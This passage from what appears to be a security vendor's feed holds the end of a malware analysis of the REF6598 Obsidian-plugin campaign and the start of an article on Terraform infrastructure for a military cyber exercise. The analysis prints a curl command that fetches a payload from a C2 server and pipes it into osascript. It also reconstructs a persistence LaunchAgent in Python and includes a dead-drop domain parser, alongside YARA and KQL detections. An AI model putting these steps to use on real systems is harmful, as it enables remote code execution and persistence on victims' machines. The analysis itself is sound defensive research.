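<p>The persistence mechanism is easy to reproduce for detection testing. The Python sketch below rebuilds a plist with the observed label and the <code>KeepAlive</code>/<code>RunAtLoad</code> configuration; the program arguments are an illustrative placeholder, not the literal sample contents:</p>

```python
import plistlib

# Reconstruction of the LaunchAgent: the label matches the campaign,
# the command line is an illustrative placeholder.
agent = {
    "Label": "com.vfrfeufhtjpwgray",
    "ProgramArguments": [
        "/bin/bash", "-c",
        "echo '<obfuscated AppleScript>' | osascript",
    ],
    "RunAtLoad": True,   # execute at every login
    "KeepAlive": True,   # relaunch the payload if it is terminated
}

# The serialized bytes are what land in ~/Library/LaunchAgents/
plist_bytes = plistlib.dumps(agent)
```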
<h4>Stage 2: Obfuscated AppleScript dropper</h4>
<p>The second-stage payload is an obfuscated AppleScript dropper that employs multiple evasion techniques.</p>
<p><strong>String obfuscation</strong>: All sensitive strings (domains, URLs, user-agent values) are constructed at runtime using <code>ASCII character</code>, <code>character id</code>, and <code>string id</code> calls, preventing static string extraction:</p>
<pre><code>property __tOlA5QTO5I : {(string id {48, 120, 54, 54, 54, 46, 105, 110, 102, 111})}
-- Decodes to: &quot;0x666.info&quot;
</code></pre>
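<p>The same decoding is trivial to reproduce when triaging these scripts, since AppleScript's <code>string id</code> maps directly to Unicode code points:</p>

```python
# Character codes lifted from the AppleScript property above.
codes = [48, 120, 54, 54, 54, 46, 105, 110, 102, 111]
decoded = "".join(chr(c) for c in codes)
print(decoded)  # -> 0x666.info
```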
<p><strong>Decoy variables</strong>: Numerous unused variables with random names and values are defined to increase entropy and hinder analysis.</p>
<p><strong>Fragmented concatenation</strong>: Strings are split across mixed encoding methods, combining literal fragments with character-ID lookups to defeat pattern matching.</p>
<h4>C2 resolution with Telegram fallback</h4>
<p>The dropper implements a layered C2 resolution strategy:</p>
<ol>
<li><strong>Primary</strong>: Iterates over a hardcoded domain list (including <code>0x666[.]info</code>), sending a POST request with body <code>&quot;check&quot;</code> to validate C2 availability</li>
<li><strong>Fallback</strong>: If the primary domain is unreachable, scrapes a public Telegram channel (<code>t[.]me/ax03bot</code>) to extract a backup domain<br />
<img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image8.png" alt="Backup Domain" title="Backup Domain" /></li>
</ol>
<p>This Telegram dead-drop technique allows operators to rotate C2 infrastructure, making domain-based blocking insufficient as a sole mitigation.</p>
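<p>Replaying the extraction step offline makes this pattern easier to hunt for. A hedged Python sketch of a dead-drop parser follows; the real dropper's extraction marker is not reproduced here, so a generic domain regex stands in for it:</p>

```python
import re

def extract_backup_domain(page_html: str):
    """Pull the first domain-looking token from a scraped channel page,
    or return None if nothing matches."""
    match = re.search(r"https?://([a-z0-9][a-z0-9.-]*\.[a-z]{2,})", page_html)
    return match.group(1) if match else None

# Usage sketch: feed in the fetched HTML of the public channel page.
sample = '<div class="tgme_widget">https://backup.example.net/gate</div>'
```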
<h4>Payload retrieval</h4>
<p>Once a C2 is resolved, the script downloads and pipes a second-stage payload directly into <code>osascript</code>:</p>
<pre><code>curl -s --connect-timeout 5 --max-time 10 --retry 3 --retry-delay 2 -X POST &lt;C2_URL&gt; \
  -H &quot;User-Agent: &lt;spoofed Chrome UA&gt;&quot; -d &quot;txid=346272f0582541ae5dd08429bb4dc4ff&amp;bmodule&quot; | osascript
</code></pre>
<p>The victim identifier (<code>txid</code>) and module selector (<code>bmodule</code>) are sent as POST parameters. The response is expected to be another AppleScript payload executed immediately. At the time of analysis, the C2 servers for the macOS chain were offline, preventing the collection of subsequent stages.</p>
<h3>Infrastructure analysis</h3>
<h4>Wallet activity</h4>
<p>Examining the on-chain activity for the hardcoded wallet (<code>0xc117688c530b660e15085bF3A2B664117d8672aA</code>) reveals the operator's C2 rotation history. The two most recent transactions are self-transfers (wallet to itself), each encoding a different C2 URL in the transaction input data:</p>
<table>
<thead>
<tr>
<th>Date (UTC)</th>
<th>Decoded C2 URL</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>Feb 19, 2026 12:29:47</code></td>
<td><code>https://panel.fefea22134[.]net</code></td>
</tr>
<tr>
<td><code>Feb 12, 2026 22:01:59</code></td>
<td><code>https://thoroughly-publisher-troy-clara[.]trycloudflare[.]com</code></td>
</tr>
</tbody>
</table>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image17.png" alt="Transaction history" title="Transaction history" /></p>
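<p>Recovering a C2 URL from a transaction's input field is a plain hex-to-UTF-8 conversion. A short Python sketch, where the input value is illustrative rather than one of the literal transactions:</p>

```python
def decode_tx_input(data: str) -> str:
    """Decode an Ethereum transaction input field ('0x...') as UTF-8 text."""
    return bytes.fromhex(data.removeprefix("0x")).decode("utf-8",
                                                         errors="replace")

# Illustrative input data, as a JSON-RPC node would return it.
tx_input = "0x" + "https://panel.example.net".encode().hex()
```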
<p>The use of a Cloudflare Tunnel domain (<code>trycloudflare[.]com</code>) as a prior C2 endpoint is notable, as it allows the operator to expose a local server through Cloudflare's infrastructure without registering a domain, providing an additional layer of anonymity.</p>
<p>The wallet was initially funded on Feb 12, 2026, at 21:39:47 UTC by a separate account (<code>0x38796B8479fDAE0A72e5E7e326c87a637D0Cbc0E</code>) with a transfer of $5.84 and an empty input field (<code>0x</code>), confirming this was purely a funding transaction. The funding wallet itself has conducted approximately 50 transactions over the past three months, which provides a potential pivot point for uncovering additional campaigns operated by the same threat actor.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image39.png" alt="Funding wallet transactions" title="Funding wallet transactions" /></p>
<h4>Payload staging server</h4>
<p>The initial payload delivery server at <code>195.3.222[.]251</code> is hosted on <strong>AS 201814 (MEVSPACE sp. z o.o.)</strong>, a Polish hosting provider.</p>
<h4>PhantomPulse C2 panel</h4>
<p>The domain <code>fefea22134[.]net</code> resolves to Cloudflare IPs (<code>104.21.79[.]142</code> and <code>172.67.146[.]15</code>), indicating the C2 panel sits behind Cloudflare's proxy. Historical passive DNS shows the domain was first resolved on 2026-03-12, with subsequent resolutions pointing to different IPs (<code>188.114.97[.]1</code> and <code>188.114.96[.]1</code>) on 2026-03-20.</p>
<p>The domain uses a Let's Encrypt certificate issued on 2026-02-19:</p>
<ul>
<li><strong>Serial</strong>: <code>5130b76e63cd41f11e6b7c2a77f203f72b4</code></li>
<li><strong>Thumbprint</strong>: <code>6c0a1da746438d68f6c4ffbf9a10e873f3cf0499</code></li>
<li><strong>Validity</strong>: <code>2026-02-19 to 2026-05-20</code></li>
</ul>
<p>The certificate issuance date (Feb 19) aligns with the most recent blockchain C2 rotation transaction encoding <code>panel.fefea22134[.]net</code>, suggesting the infrastructure was provisioned the same day the C2 URL was published on-chain.</p>
<h2>Conclusion</h2>
<p>REF6598 demonstrates how threat actors continue to find creative initial access vectors by abusing trusted applications and employing targeted social engineering. By abusing Obsidian's community plugin ecosystem rather than exploiting a software vulnerability, the attackers bypass traditional security controls entirely, relying on the application's intended functionality to execute arbitrary code.</p>
<p>In the observed intrusion, <a href="https://www.elastic.co/security/endpoint-security">Elastic Defend</a> detected and blocked the attack chain at an early stage, before PHANTOMPULSE could execute, preventing the threat actor from achieving their objectives. The behavioral protections triggered on the anomalous process execution originating from Obsidian, stopping the payload delivery in its tracks.</p>
<p>Organizations in the financial and cryptocurrency sectors should be aware that legitimate productivity tools can be turned into attack vectors. Defenders should monitor for anomalous child process creation from applications like Obsidian and enforce application-level plugin policies where possible. The indicators and detection logic provided in this research can be used to identify and respond to this activity.</p>
<p>Elastic Security Labs will continue to monitor REF6598 for further developments, including additional macOS payloads once the associated C2 infrastructure becomes active.</p>
<h4>MITRE ATT&amp;CK</h4>
<p>Elastic uses the <a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a> framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.</p>
<h5>Tactics</h5>
<p>Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/tactics/TA0001/">Initial Access</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0002/">Execution</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0003/">Persistence</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0004/">Privilege Escalation</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0005/">Defense Evasion</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0009/">Collection</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0007/">Discovery</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0011/">Command and Control</a></li>
</ul>
<h5>Techniques</h5>
<p>Techniques represent how an adversary achieves a tactical goal by performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/techniques/T1566/003/">Phishing: Spearphishing via Service</a></li>
<li><a href="https://attack.mitre.org/techniques/T1204/002/">User Execution: Malicious File</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/001/">Command and Scripting Interpreter: PowerShell</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/002/">Command and Scripting Interpreter: AppleScript</a></li>
<li><a href="https://attack.mitre.org/techniques/T1140/">Deobfuscate/Decode Files or Information</a></li>
<li><a href="https://attack.mitre.org/techniques/T1620/">Reflective Code Loading</a></li>
<li><a href="https://attack.mitre.org/techniques/T1497/003/">Virtualization/Sandbox Evasion: Time Based Evasion</a></li>
<li><a href="https://attack.mitre.org/techniques/T1055/">Process Injection</a></li>
<li><a href="https://attack.mitre.org/techniques/T1053/005/">Scheduled Task/Job: Scheduled Task</a></li>
<li><a href="https://attack.mitre.org/techniques/T1547/011/">Boot or Logon Autostart Execution: Plist Modification</a></li>
<li><a href="https://attack.mitre.org/techniques/T1056/001/">Input Capture: Keylogging</a></li>
<li><a href="https://attack.mitre.org/techniques/T1113/">Screen Capture</a></li>
<li><a href="https://attack.mitre.org/techniques/T1082/">System Information Discovery</a></li>
<li><a href="https://attack.mitre.org/techniques/T1548/002/">Abuse Elevation Control Mechanism: Bypass UAC</a></li>
</ul>
<h3>Detecting REF6598</h3>
<h4>Detection</h4>
<p>The following detection rules and behavior prevention events were observed throughout the analysis of this intrusion set:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ff73f1344671a50945c40c45af0ae0b6fc2ed840/rules/windows/execution_windows_powershell_susp_args.toml#L27">Suspicious Windows Powershell Arguments</a></li>
</ul>
<h4>Prevention</h4>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/c28c16baea1b0c9d2ebc63dfc1880635890fd91e/behavior/rules/windows/execution_suspicious_powershell_execution.toml#L8">Suspicious PowerShell Execution</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/c28c16baea1b0c9d2ebc63dfc1880635890fd91e/behavior/rules/windows/defense_evasion_network_module_loaded_from_suspicious_unbacked_memory.toml">Network Module Loaded from Suspicious Unbacked Memory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/c28c16baea1b0c9d2ebc63dfc1880635890fd91e/behavior/rules/macos/defense_evasion_base64_encoded_string_execution_via_osascript.toml">Base64 Encoded String Execution via Osascript</a></li>
</ul>
<h4>Hunting queries in Elastic</h4>
<p>These hunting queries identify the presence of the Obsidian Shell Commands community plugin, as well as the resulting command execution:</p>
<h5>KQL</h5>
<pre><code>event.category : file and process.name : (Obsidian or Obsidian.exe) and
 file.path : *obsidian-shellcommands*
</code></pre>
<pre><code>event.category : process and event.type : start and
 process.name : (sh or bash or zsh or powershell.exe or cmd.exe) and 
 process.parent.name : (Obsidian.exe or Obsidian)
</code></pre>
<h5>YARA</h5>
<p>Elastic Security has created the following YARA rules to identify the <strong>PHANTOMPULL</strong> loader and the <strong>PHANTOMPULSE</strong> RAT.</p>
<pre><code>rule Windows_Trojan_PhantomPull {
    meta:
        author = &quot;Elastic Security&quot;
        os = &quot;Windows&quot;
        category_type = &quot;Trojan&quot;
        family = &quot;PhantomPull&quot;
        threat_name = &quot;Windows.Trojan.PhantomPull&quot;
        reference_sample = &quot;70bbb38b70fd836d66e8166ec27be9aa8535b3876596fc80c45e3de4ce327980&quot;

    strings:
        $GetTickCount = { 48 83 C4 80 FF 15 ?? ?? ?? ?? 83 F8 FE 75 }
        $djb2 = { 45 8B 0C 83 41 BA A7 C6 67 4E 49 01 C9 45 8A 01 }
        $mutex = { 48 89 EB 83 E3 ?? 45 8A 2C 1C 45 32 2C 2E 45 0F B6 FD }
        $str_decrypt = { 39 C2 7E ?? 49 89 C1 41 83 E1 ?? 47 8A 1C 0A 44 32 1C 01 45 88 1C 00 48 FF C0 }
        $payload_decrypt = { 4C 89 C8 83 E0 0F 41 8A 14 02 43 30 14 0F 49 FF C1 44 39 CB }
        $url = &quot;/v1/updates/check?build=payloads&quot; ascii fullword
    condition:
        3 of them
}

</code></pre>
<pre><code>rule Windows_Trojan_PhantomPulse {
    meta:
        author = &quot;Elastic Security&quot;
        os = &quot;Windows&quot;
        category_type = &quot;Trojan&quot;
        family = &quot;PhantomPulse&quot;
        threat_name = &quot;Windows.Trojan.PhantomPulse&quot;
        reference_sample = &quot;9e3890d43366faec26523edaf91712640056ea2481cdefe2f5dfa6b2b642085d&quot;

    strings:
        $a = &quot;[UNINSTALL 2/6] Removing Scheduled Task...&quot; fullword
        $b = &quot;PhantomInject: host PID=%lu&quot; fullword
        $c = &quot;inject: shellcode detected -&gt; InjectShellcodePhantom&quot; fullword
        $d = &quot;inject: shellcode detected, using phantom section hijack&quot; fullword
    condition:
        all of them
}
</code></pre>
<h3>Observations</h3>
<p>The following observables were discussed in this research.</p>
<table>
<thead>
<tr>
<th>Observable</th>
<th>Type</th>
<th>Name</th>
<th>Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>70bbb38b70fd836d66e8166ec27be9aa8535b3876596fc80c45e3de4ce327980</code></td>
<td>SHA-256</td>
<td><code>syncobs.exe</code></td>
<td>PHANTOMPULL loader</td>
</tr>
<tr>
<td><code>33dacf9f854f636216e5062ca252df8e5bed652efd78b86512f5b868b11ee70f</code></td>
<td>SHA-256</td>
<td></td>
<td>PhantomPulse RAT (final payload)</td>
</tr>
<tr>
<td><code>195.3.222[.]251</code></td>
<td>ipv4-addr</td>
<td></td>
<td>Staging server (PowerShell script &amp; loader delivery)</td>
</tr>
<tr>
<td><code>panel.fefea22134[.]net</code></td>
<td>domain-name</td>
<td></td>
<td>PhantomPulse C2 panel</td>
</tr>
<tr>
<td><code>0x666[.]info</code></td>
<td>domain-name</td>
<td></td>
<td>macOS dropper C2 domain</td>
</tr>
<tr>
<td><code>t[.]me/ax03bot</code></td>
<td>url</td>
<td></td>
<td>macOS dropper Telegram fallback C2</td>
</tr>
<tr>
<td><code>0xc117688c530b660e15085bF3A2B664117d8672aA</code></td>
<td>crypto-wallet</td>
<td></td>
<td>Ethereum wallet for blockchain C2 resolution</td>
</tr>
<tr>
<td><code>0x38796B8479fDAE0A72e5E7e326c87a637D0Cbc0E</code></td>
<td>crypto-wallet</td>
<td></td>
<td>Funding wallet for C2 resolution wallet</td>
</tr>
<tr>
<td><code>thoroughly-publisher-troy-clara[.]trycloudflare[.]com</code></td>
<td>domain-name</td>
<td></td>
<td>Prior PhantomPulse C2 (Cloudflare Tunnel)</td>
</tr>
</tbody>
</table>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/phantom-in-the-vault.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Elastic on Defence Cyber Marvel 2026: A Technical overview from the Exercise Floor]]></title>
            <link>https://www.elastic.co/security-labs/elastic-defence-cyber-marvel</link>
            <guid>elastic-defence-cyber-marvel</guid>
            <pubDate>Thu, 09 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[An overview of the Elastic Security and AI infrastructure deployed to support the UK Ministry of Defence's flagship cyber exercise, Defence Cyber Marvel 2026.]]></description>
            <content:encoded><![CDATA[<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-defence-cyber-marvel/image1.png" alt="" /></p>
<p>Where to begin. For the fourth consecutive year, Elastic has had the privilege of serving as a trusted industry partner on Exercise Defence Cyber Marvel - the UK Ministry of Defence's flagship cyber exercise series. DCM26 was, without question, the most ambitious iteration yet, and we're chuffed to bits to finally be able to talk about what we built, how we built it, and what we learnt along the way.</p>
<h2>What is Defence Cyber Marvel?</h2>
<p>For those unfamiliar, Defence Cyber Marvel (DCM) is the largest UK military cyber exercise series that focuses on defending traditional IT networks, corporate environments, and complex industrial control systems in realistic, high-pressure scenarios. It showcases responsible cyber power whilst enhancing readiness, interoperability, and resilience across Defence and allied nations. Now in its fifth year, DCM has evolved from an Army Cyber Association initiative into a tri-service operation led by Cyber and Specialist Operations Command (CSOC).</p>
<p>The <a href="https://www.gov.uk/government/news/uk-to-lead-multinational-cyber-defence-exercise-from-singapore">UK Government published an official press release for DCM26</a>, which provides an excellent overview of the exercise's strategic importance. As the British High Commissioner to Singapore noted, the exercise demonstrates the deep cooperation between the UK and trusted partners, a reminder of the strength of shared strategic partnerships in an increasingly complex security landscape.</p>
<p>At its core, DCM is a force-on-force cyber exercise: defending Blue Teams protect their assigned networks and infrastructure from attacking Red Teams, using a range of techniques. Activities span changing default passwords and hardening firewalls through to deploying enterprise-grade, AI-powered cyber defence with <a href="https://www.elastic.co/security">Elastic Security</a>. The activities of each team are monitored by the White Team to establish a score factoring in system availability, attack detection, incident reporting, and system restoration. It stretches the most experienced teams whilst also facilitating a unique training mechanism for junior teams on their first exposure to a cyber range, and that dual purpose is what makes DCM such a valuable exercise.</p>
<h2>The scale of DCM26</h2>
<p>DCM26 brought together over 2,500 personnel from 29 participating countries and 70 organisations, coordinated from a central Exercise Control (EXCON) based out of Singapore, with EXCON hosting over 600 participants. The exercise ran across a hybrid compute environment spanning the CR14 cyber range and AWS, hosting over 5,000 virtual systems.</p>
<p>The exercise itself ran for five days of execution (9–13 February 2026), preceded by optional instructor-led pre-training and connectivity checks. The scenario, built on the Defence Academy Training Environment (DATE) Indo-Pacific Operating Environment, placed teams as Cyber Protection Teams defending deployed military systems during an escalating regional crisis. Blue Teams were geographically dispersed, some in their home locations across the UK and internationally, others deployed overseas, all connecting into the range via VPN.</p>
<p>Participants included representatives from UK Defence, cross-government departments such as the National Crime Agency, the Department for Work and Pensions, the Cabinet Office, and the Department for Business and Trade, alongside international partners forming up to 40 teams. Following the success of last year's exercise in the Republic of Korea, Singapore served as the exercise hub for the first time, reflecting the UK's commitment to deepening cooperation with Indo-Pacific partners on shared security challenges.</p>
<p>In short, it's a serious exercise. High-pressure, force-on-force, with real consequences for scoring and real learning outcomes for every participant.</p>
<h2>The deployments: Our Elastic infrastructure</h2>
<p>This year's infrastructure represented a significant architectural evolution from previous iterations. Rather than deploying individual Elastic Cloud clusters per team, we moved to a single, space-based multi-tenanted Elastic Cloud deployment for the Blue Teams. We also provided deployments for functions outside the Blue Teams. Let me break down each deployment and why it exists.</p>
<h3>Blue Teams: Multi-tenanted Elastic Security</h3>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-defence-cyber-marvel/image4.png" alt="" /></p>
<p>The centrepiece of our contribution was a single Elastic Cloud deployment serving all 40 defending Blue Teams, separated using Kibana Spaces and datastream namespaces. Each team had its own isolated workspace, including dashboards, agents, and detection rules.</p>
<p>Here's what the Terraform resource looked like for creating each team's space:</p>
<pre><code># Create 40 Blue Team spaces
resource &quot;elasticstack_kibana_space&quot; &quot;blue_team&quot; {
  count = var.team_count

  space_id    = local.space_ids[count.index]
  name        = &quot;Blue Team ${local.team_numbers[count.index]}&quot;
  description = &quot;Isolated space for BT-${local.team_numbers[count.index]} with space-aware Fleet visibility&quot;

  disabled_features = []
  color             = &quot;#0077CC&quot;
}
</code></pre>
<p>Each team's space got a dedicated set of three <a href="https://www.elastic.co/docs/reference/fleet/agent-policy">Fleet</a> agent policies: a Deployed network policy on day one, a Host Nation network policy on day two, and a PacketCapture policy for network traffic monitoring. The phased access control was elegant in its simplicity: setting <code>enable_hostnation_network = true</code> in our <code>terraform.tfvars</code> and running <code>terraform apply</code> expanded each team's role permissions and made their Host Nation agent policy visible in their space. The exercise went from one network to two without a single manual click in Kibana.</p>
<p>The data isolation relied on datastream namespaces. Each agent policy is written to team-specific namespaces like <code>bt_01_deployed</code> and <code>bt_01_hostnation</code>, producing data streams following the pattern:</p>
<pre><code>logs-system.auth-bt_01_hostnation
logs-system.syslog-bt_01_hostnation
metrics-system.cpu-bt_01_hostnation
logs-endpoint.events.process-bt_01_hostnation
logs-windows.forwarded-bt_01_hostnation
logs-auditd.log-bt_01_hostnation
</code></pre>
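<p>The naming scheme composes mechanically from team number and network name, which is what makes it easy to template in Terraform and in ad-hoc tooling alike. A small Python sketch of the convention:</p>

```python
TEAMS = range(1, 41)                    # 40 Blue Teams
NETWORKS = ("deployed", "hostnation")   # the two exercise networks

# bt_01_deployed, bt_01_hostnation, bt_02_deployed, ...
namespaces = [f"bt_{team:02d}_{net}" for team in TEAMS for net in NETWORKS]

# Each integration then writes to data streams such as:
auth_streams = [f"logs-system.auth-{ns}" for ns in namespaces]
```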
<p>Each team's Kibana security role was then scoped to only those data streams using dynamic index privilege blocks:</p>
<pre><code># Deployed data streams (always granted)
indices {
  names = [
    &quot;logs-*-${local.deployed_namespaces[count.index]}&quot;,
    &quot;metrics-*-${local.deployed_namespaces[count.index]}&quot;,
    &quot;.fleet-*&quot;
  ]
  privileges = [&quot;read&quot;, &quot;view_index_metadata&quot;]
}

# HostNation data streams (conditional on enable_hostnation_network)
dynamic &quot;indices&quot; {
  for_each = var.enable_hostnation_network ? [1] : []
  content {
    names = [
      &quot;logs-*-${local.hostnation_namespaces[count.index]}&quot;,
      &quot;metrics-*-${local.hostnation_namespaces[count.index]}&quot;
    ]
    privileges = [&quot;read&quot;, &quot;view_index_metadata&quot;]
  }
}
</code></pre>
<p>Authentication was handled via Keycloak SSO, with Elasticsearch role mappings connecting Keycloak groups to Kibana roles:</p>
<pre><code>resource &quot;elasticstack_elasticsearch_security_role_mapping&quot; &quot;blue_team&quot; {
  count = var.team_count

  name    = &quot;bt-${local.team_numbers[count.index]}-keycloak-mapping&quot;
  enabled = true

  roles = [
    elasticstack_kibana_security_role.blue_team[count.index].name
  ]

  rules = jsonencode({
    field = {
      groups = &quot;${local.keycloak_groups[count.index]}&quot;
    }
  })
}
</code></pre>
<p>The default integration policies were simple by design. Each team received: System for core OS telemetry, Elastic Defend for Endpoint Detection and Response, Windows event forwarding, Auditd for Linux audit logging, and Network Packet Capture integrations. That's over 400 integration policies managed as code via the <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">Elastic Stack Terraform Provider</a>.</p>
<p>A note on Elastic Defend: due to the effectiveness of Elastic's endpoint protection - which is trusted in production by the <a href="https://www.elastic.co/blog/defense-and-intelligence-community-endpoint-security">US DOD and IC, read more about that here</a> - and the fact that nobody in their right mind is burning zero-day exploits on a training exercise, we're forced to handicap Elastic Defend by disabling Prevent mode, leaving it in Detect-only mode. Teams get alerts when something malicious happens, but without automatic mitigation. We also completely disable Memory Threat Prevention and Detection, as this discovers the majority of attacking team implants and beacons, which would rather spoil the game for the Red Teams. Toward the end of the exercise, we allowed the teams the freedom to use Elastic Defend to its full capability, but not before letting the Red Teams get a strong foothold.</p>
<p>We also pre-installed Elastic's <a href="https://www.elastic.co/docs/reference/security/prebuilt-rules">prebuilt detection rules</a> into each team space - the full set from Elastic Security Labs, continuously updated in an open repository. These rules were set up to query only the indices that the team's namespace-scoped permissions allowed, preventing any cross-team data leakage in detection rule execution.</p>
<p>Additionally, each team space had its Security Solution default index configured to scope detection rules to only that team's data streams, rather than the default broad pattern. This was handled by a Terraform <code>null_resource</code> that called the Kibana internal settings API to set <code>securitySolution:defaultIndex</code> for each space.</p>
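<p>Outside Terraform, the same per-space setting can be applied with a short script. The hedged Python sketch below only builds the request; it assumes the space-prefixed <code>/api/kibana/settings</code> endpoint, which is an internal API and may change between Kibana versions:</p>

```python
import json
import urllib.request

def default_index_request(kibana_url: str, space_id: str,
                          namespace: str, api_key: str) -> urllib.request.Request:
    """Build a request that scopes a space's Security Solution default index."""
    body = json.dumps({
        "changes": {
            "securitySolution:defaultIndex": [
                f"logs-*-{namespace}",
                f"metrics-*-{namespace}",
            ]
        }
    }).encode()
    return urllib.request.Request(
        f"{kibana_url}/s/{space_id}/api/kibana/settings",
        data=body,
        method="POST",
        headers={
            "kbn-xsrf": "true",                    # required by Kibana
            "Content-Type": "application/json",
            "Authorization": f"ApiKey {api_key}",
        },
    )

req = default_index_request("https://kibana.example", "bt-01",
                            "bt_01_deployed", "example-key")
# urllib.request.urlopen(req) would then apply the change.
```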
<p>At peak, this deployment was ingesting 800,000 events per second (EPS) across all 40 teams. That's a serious amount of data, and the cluster handled it comfortably thanks to the autoscaling capabilities of Elastic Cloud. <a href="https://www.elastic.co/blog/monitoring-petabytes-of-logs-at-ebay-with-beats">For context, back in 2018 we were doing 5 million events per second with eBay.</a></p>
<p>Data lifecycle was managed by an Index Lifecycle Management (ILM) policy that rolled indices over after one day or <code>50</code> GB (whichever came first), moved them to a warm phase after two days for read-only optimisation and force-merging, and then deleted data after ten days. As a result, storage costs were minimised while still meeting the exercise's retention requirements. Below is an example of how the ILM policy was implemented.</p>
<pre><code>resource &quot;elasticstack_elasticsearch_index_lifecycle&quot; &quot;dcm5_10day_retention&quot; {
  name = &quot;dcm5-10day-retention&quot;

  hot {
    min_age = &quot;0ms&quot;

    set_priority {
      priority = 100
    }

    rollover {
      max_age                = &quot;1d&quot;
      max_primary_shard_size = &quot;50gb&quot;
    }
  }

  warm {
    min_age = &quot;2d&quot;

    set_priority {
      priority = 50
    }

    readonly {}

    forcemerge {
      max_num_segments = 1
    }
  }

  delete {
    min_age = &quot;${var.data_retention_days}d&quot;

    delete {
      delete_searchable_snapshot = true
    }
  }
}
</code></pre>
<h3>The shard stress test: Proving multi-tenancy at scale</h3>
<p>Before committing to this architecture for a live military exercise, we needed to prove it would be able to meet our requirements and have an appropriate failover in place in the event of issues. Moving from individual deployments to a single multi-tenanted cluster introduced real risks: resource contention, ingest bottlenecks, data leakage across spaces due to misconfiguration, large TCP connection counts on the Elasticsearch nodes, and a significantly larger shard count since each team generates its own set of indices.</p>
<p>So we built a dedicated testing rig. The plan was straightforward: deploy 50 Kibana Spaces, create an agent policy in each space, launch 6,000 EC2 instances (120 per tenant, across six subnets in three availability zones), and load-test the lot. We monitored everything with AutoOps and Stack Monitoring.</p>
<p>The deployment flow worked like this: Terraform created the VPC and subnets across three availability zones, provisioned the 50 Kibana Spaces and their space-scoped Fleet policies, generated enrolment tokens, and then launched EC2 instances in batches. Each instance installed Elastic Agent on boot and enrolled against its space-specific token.</p>
<p>We hit some interesting challenges along the way. The standard Elastic Stack Terraform Provider didn't support space-aware Fleet operations at the time, so we forked it and added space ID handling to the Fleet resources - without that modification, every agent would have enrolled into the default space regardless of policy assignment. This wasn't the first time we'd had to extend the provider for an exercise; two years ago, for DCM2, we'd added the <code>elasticsearch_cluster_info</code> data source. Fortunately, the upstream provider has since added <code>support for space_ids</code> in version <code>0.12.2</code>.</p>
<p>We also ran into AWS EC2 API rate limits when trying to spin up all 6,000 instances simultaneously, so we batched deployments at 500 instances with five-minute cool-off periods between batches.</p>
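<p>The batching logic itself is simple. A Python sketch of the pattern, where the batch size and cool-off match the figures above and the <code>launch</code> helper is hypothetical:</p>

```python
def batches(instance_ids: list, size: int = 500):
    """Yield deployment batches sized to stay under the EC2 API rate limits."""
    for start in range(0, len(instance_ids), size):
        yield instance_ids[start:start + size]

# Usage sketch: launch each batch, then cool off for five minutes.
# for batch in batches(all_instance_ids):
#     launch(batch)              # hypothetical wrapper around EC2 RunInstances
#     time.sleep(5 * 60)         # five-minute cool-off between batches
```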
<p>The results were reassuring. All 6,000 agents were typically enrolled within 20 minutes of deployment. In our tests, space isolation worked as expected with no observed data leakage between tenants. Fleet policy updates propagated to all agents within 60 seconds. Search queries scoped to individual spaces remained fast under full load. And the multi-AZ distribution proved resilient during simulated availability zone failures.</p>
<p>This testing gave us the confidence to commit to the architecture for the live exercise.</p>
<h3>Red Teams: C2 implant observability</h3>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-defence-cyber-marvel/image3.png" alt="" /></p>
<p>A separate, dedicated Elastic deployment was stood up for the Red Teams, focused on Command and Control (C2) implant observability. This gave the attacking teams visibility into their own operations, including implant status, beacon callbacks, and operational progress, without any risk of cross-pollination with the Blue Team's data. The Red Teams used Tuoni as their C2, which is a framework developed by Clarified Security for red teaming. In DCM3, we worked with Clarified Security to ensure it properly supported the Elastic Common Schema, making future integration with Elastic much easier.</p>
<h3>NSOC: Exercise Network Security Operations Centre</h3>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-defence-cyber-marvel/image6.png" alt="" /></p>
<p>The core exercise, Network Security Operations Centre (NSOC), ran on its own Elastic deployment, providing the exercise control staff with an overarching view of range health, security monitoring across the entire infrastructure, and critically, audit logging for all the AI services we deployed. Every <a href="https://www.elastic.co/docs/reference/integrations/aws_bedrock">Bedrock API invocation was logged in CloudWatch</a> and observable in this deployment, meaning the NSOC had complete visibility into what was being asked of the AI agents, and by whom. More on this in the AI section below.</p>
<h2>Infrastructure automation: Terraform and Catapult</h2>
<p>Everything you've seen above was managed as Infrastructure as Code. Our <code>provider.tf</code> gives a sense of the provider ecosystem we were orchestrating:</p>
<pre><code>terraform {
  required_version = &quot;&gt;= 1.5&quot;

  required_providers {
    elasticstack = {
      source  = &quot;elastic/elasticstack&quot;
      version = &quot;~&gt; 0.13.1&quot;
    }
    aws = {
      source  = &quot;hashicorp/aws&quot;
      version = &quot;~&gt; 5.0&quot;
    }
    vault = {
      source  = &quot;hashicorp/vault&quot;
      version = &quot;~&gt; 3.20&quot;
    }
    cloudflare = {
